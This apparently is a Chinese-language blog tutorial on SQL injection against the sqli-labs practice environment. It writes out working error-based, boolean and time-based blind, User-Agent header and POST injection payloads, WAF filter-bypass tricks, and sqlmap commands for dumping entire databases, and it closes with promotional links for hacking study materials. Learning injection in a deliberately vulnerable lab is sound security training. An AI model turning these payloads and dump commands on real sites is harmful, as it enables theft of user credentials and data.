http://192.168.10.150/sqlilabs/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ )),3)–+
确定数据库信息
可以通过limit来进行翻页查看
http://192.168.10.150/sqlilabs/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select group_concat(username) from users )),3)–+ http://192.168.10.150/sqlilabs/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select group_concat(password) from users )),3)–+
布尔盲注
布尔盲注一般适用于页面没有回显位置,也就是不支持联合查询,同时web页面返回true或者false构造SQL语句,从而达到注入获取数据的目的。
布尔盲注步骤
求数据库名的长度及ASCII》求当前数据库表的ASCII》求当前数据库表中的个数》求数据库中表名的长度》求数据库中表名》求列名的数量》求列名的长度》求列名的ASCII》求字段的数量》求字段的长度》求字段内容ASCII
(3)常用布尔函数使用语法
1)substr()截取函数
语法:substr(str,start,length)
第一个参数str为被截取的字符串。
第二个参数start为开始截取的位置。
第三个参数length为截取的长度。
如:substr(user(),1,1),从user中返回的数据的第一位开始偏移位置截取一位,后续需要获取其他的数据只需要修改参数即可。
2)left()截取函数
语法:left(str,length)
第一个参数str为被截取的字符串。
第二个参数length为截取的长度。
如:left(user(),2),从user中返回的数据中截取前两位。
3)right()截取函数
语法:rigth(user(),2)
参考left()函数用法。
4)ascii()转换函数
语法:ascii(char)
第一个参数char为一个字符。
如:ascii(user())若char为一串字符串,则返回的结果将是第一个字母的ASCII码,通常在使用中结合substr函数结合使用。Ascii(substr(user()1,1)),这样就可以获取user()中第一位字符的ASCII码。
5)length()计算函数
语法:length(str)
第一个参数str为字符串。
如:length(admin)返回就是5。如果不是放某个字符串,放置表达式的时候,需要使用括号括起来。
6)ord()转换函数
语法:ord(str)
参考ascii()函数用法。
如果存在没写到的函数,但是使用了,可以自行搜索。
判断注入点
?id=1 and 1=1–+ 正常
?id=1 and 1=2–+ 正常
到这里其实基本上可以判断不是数字型了,那么就需要按照我们上面提到的干扰字符进行测试,可以按照上述的字段判断一条一条测试。
?id=1’ and 1=2–+ 不正常
判断此为字符型
猜测数据库版本号
数据库版本是5.6.17,这里的语句意思就是测试数据库版本第一位是不是5,通过返回的结果显示是对的。若不是5则页面返回错误,若是5则页面返回正确。
http://192.168.10.150/sqlilabs/Less-5/?id=1’ and left (version(),1)=5–+
时间盲注
基本概念
时间盲注就是通过拼接if语句,构造我们判断的条件,根据条件的结果返回sleep()函数,使得页面的响应时间比正常的响应时间长,但是这个会由于网络情况造成误判,所以在测试前需要测试正常访问页面的时长。
时间盲注基本步骤
其实这里的基本步骤和布尔盲注都差不多,只不过是通过页面的响应时间来进行判断。
常用盲注函数
1)if()比较函数
语法:if(cond,ture_result,False_result)
第一个参数cond为判断条件。
第二个参数ture_result为真时的返回结果。
第三个参数false_result为假时的返回结果。
如:?id=1 and 1=if (ascii(substr(user(),1,1))=97,1,2)
如果user 的第一位是‘a’则将返回1,否则就返回2。然而,如果返回的是2,则会使and后的条件不成立,导致返回错误页面。这时我们可以根据页面的长度进行判定,从而达到盲注的效果。
2)sleep()睡眠函数
语法:sleep(N)
第一个参数N是睡眠的时间
如:if (ascii(substr(user(),1,1))=114,sleep(5),2)
这样的话,如果user的第一位是‘r’,则页面返回将延迟5秒。这里需要注意的是,这5秒是在服务器端的数据库中延迟的,实际情况可能会由于网络环境等因素延迟更长时间
如果存在没写到的函数,但是使用了,可以自行搜索。
判断是否存在时间盲注
先判断正常访问页面需要的时间,再写入payload后页面响应的时间。F12-----网络
防止网络因素造成的误判
http://192.168.10.150/sqlilabs/Less-8/?id=1’ and sleep(5)–+
猜测数据库名长度
sleep(5),1 代表如果正确了等待5秒加载页面,错误了就秒加载页面
http://192.168.10.150/sqlilabs/Less-8/?id=1’ and if(length(database())=8,sleep(5),1)–+
HTTP头部注入
HTTP头部注入基本概念
1)HTTP头部注入原理
后台开发人员为了验证客户端HTTP Header(比如常用的Cookie验证等)或者通过HTTP Header头信息获取客户端的一些信息(例如:User-Agent、Accept字段等),会对客户端HTTP Header 进行获取并使用SQL语句进行处理,如果此时没有足够的安全考虑,就可能导致基于HTTP Header的注入漏洞
2)常见HTTP头部注入类型
Cookie:网站为了辨别用户身份、进行session跟踪而存储在用户本地终端上的数据。
User-agent:使服务器能够识别客户端使用的操作系统,浏览器版本等。
Referer:浏览器向web服务器表名自己是从哪个页面过来的。
X-forwarded-for:简称xff头,它代表客户端(即http的请求端)真实IP。
3)头部注入的前提
能够对请求头消息进行修改,修改请求头信息能够带入数据库执行,数据库没有对输入的请求头做过滤。
判断注入点
登录后发现有显示http头部User-agent信息。
判断是否存在报错
可以通过burp抓包来修改User-agent值。
输入’单引号后发现有报错,即使用报错注入进行注入
使用报错语句进行测试
步骤基本与报错注入一致
User-Agent: 'and updatexml(1,0x7e,3)and ‘1’='1
确认数据库名
User-Agent: 'and updatexml(1,concat(0x7e,database()),3) and ’
确认数据库版本号
User-Agent: 'and updatexml(1,concat(0x7e,version()),3) and ’
确认数据库表名
User-Agent: 'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ )),3) and ’
确认数据库列名
User-Agent: 'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ )),3) and ’
拿取数据
User-Agent: 'and updatexml(1,concat(0x7e,(select username from users limit 0,1 )),3) and ’
POST注入
(1)post注入基本概念
1)post注入原理
数据从客户端提交到服务器端,例如我们在登录过程中,输入用户名和密码,用户名和密码以表单的形式提交,提交到服务器后服务器再进行验证。这就是一次post的过程的。
2)post注入前提
用户能够控制输入,原本程序要执行的代码,拼接了用户输入的数据。
3)post注入高危点
登录框、查询框、等各种和数据库有交互的框。
(2)post注入思路
在 post 过程中,我们输入的用户名和密码最后在后台处理的过程中依旧会形成前面所见到的 sql 语句,那么我们是否可以像 get 型的一样构造我们想要的 payload 呢?
判断注入点
输入:用户名:admin’ and 1=1#
密码:随便输入 登录成功
判断字段数
uname=admin’ order by 3#
判断回显点
注意前面要加个-
uname=-admin’ union select 1,2#
确定数据库名
当然这里有时候用不了联合查询,可以使用报错、布尔等方式进行注入。
uname=-admin’ union select database(),2#
WAF绕过
(1)WAF原理
1)WAF原理
WAF(web application firewall)web应用防火墙,它工作在OSI模型的第七层,也就是我们所熟知的应用层,对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,为Web应用提供防护,也称作应用防火墙,是网络安全纵深防御体系里重要的一环。WAF属于检测型及纠正型防御控制措施。
2)WAF分类
WAF分为非嵌入型WAF和嵌入型WAF,非嵌入型指的是硬WAF、云WAF、虚拟机WAF之类的;嵌入型指的是web容器模块类型WAF、代码层WAF。
3)WAF工作过程
解析HTTP请求》匹配规则》防御动作》记录日志
2.常见过滤
(1)空格过滤绕过
① 两个空格代替一个
② 用TAB代替空格
③ %a0=空格
④ 若括号没被过滤可以使用括号进行过滤
⑤ %0B绕过
(2)or或and过滤绕过
① 大小写变形Or,OR,oR
② 编码
③ 添加注释/or/
④ 利用符号 and=&&,or=||
⑤ 双写and=anandd,or=oorr
(3)#或–+过滤绕过
① 单引号闭合需要在后面增加一个单引号即可
② 双引号闭合需要在后面注入语句后面增加一个双引号
③ (‘’)单引号加括号这种需要多加一个or (‘’)=('1
④ (“”)双引号加括号这种需要多加一个or (“”)=("1
⑤ or ‘1’=’1进行闭合。
(4)union,select等关键字过滤绕过
① 大小写绕过uNIon,sEeCt
② 双写绕过uniunionon,selselctct
③ 注释符绕过U/**/nion
④ 内联注释/!union/
⑤ 编码绕过
(5)等号过滤绕过
① 大于号小于号替代等号
② like绕过
(6)函数过滤绕过
① 同功能函数替换mid()替换substring()
② 各类编码绕过
当然还存在很多的绕过方式,可能还存在很多奇奇怪怪的绕过姿势,这里就总结一下常见的。
sqlmap工具常用参数
命令:sqlmap -r 55.txt -batch
#通过抓包保存为txt文件,然后通过sqlmap软件进行扫描
命令:Sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1"
#探测该页面是否存在漏洞。
命令:sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" --cookie="抓取的cookie"
#当网站需要登录时,探测该页面是否存在漏洞。
命令:sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" --data="username=admin&password=admin&submit=submit"
#抓取其post提交的数据填入
命令:sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" --dump-all
#一键脱库命令
命令:sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" --dbs
#爆出所有的数据库
命令:sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" --tables
#爆出所有的数据表
命令:sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" --columns
#爆出数据库中所有的列
命令:sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" --current-db
#查看当前的数据库
命令:sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" -D security --tables
#爆出数据库security中的所有的表
命令:sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" -D security -T users --columns
#爆出security数据库中users表中的所有的列
命令:sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" -D security -T users -C username --dump
#爆出数据库security中的users表中的username列中的所有数据
命令:sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" -D security -T users -C username --dump --start 1 --stop 100
#爆出数据库security中的users表中的username列中的前100条数据
sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" -D security -T users --dump-all
#爆出数据库security中的users表中的所有数据
sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" -D security --dump-all
#爆出数据库security中的所有数据
sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" --dump-all
#爆出该数据库中的所有数据
sqlmap -u "http://192.168.10.150/sqlilabs/Less-1/?id=1" --users
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
***93道网络安全面试题***
内容实在太多,不一一截图了
### 黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
😝朋友们如果有需要的话,可以联系领取~
#### 1️⃣零基础入门
##### ① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
##### ② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
#### 2️⃣视频配套工具&国内外网安书籍、文档
##### ① 工具
##### ② 视频
##### ③ 书籍
资源较为敏感,未展示全面,需要的最下面获取
##### ② 简历模板
**因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆**
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
3355
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
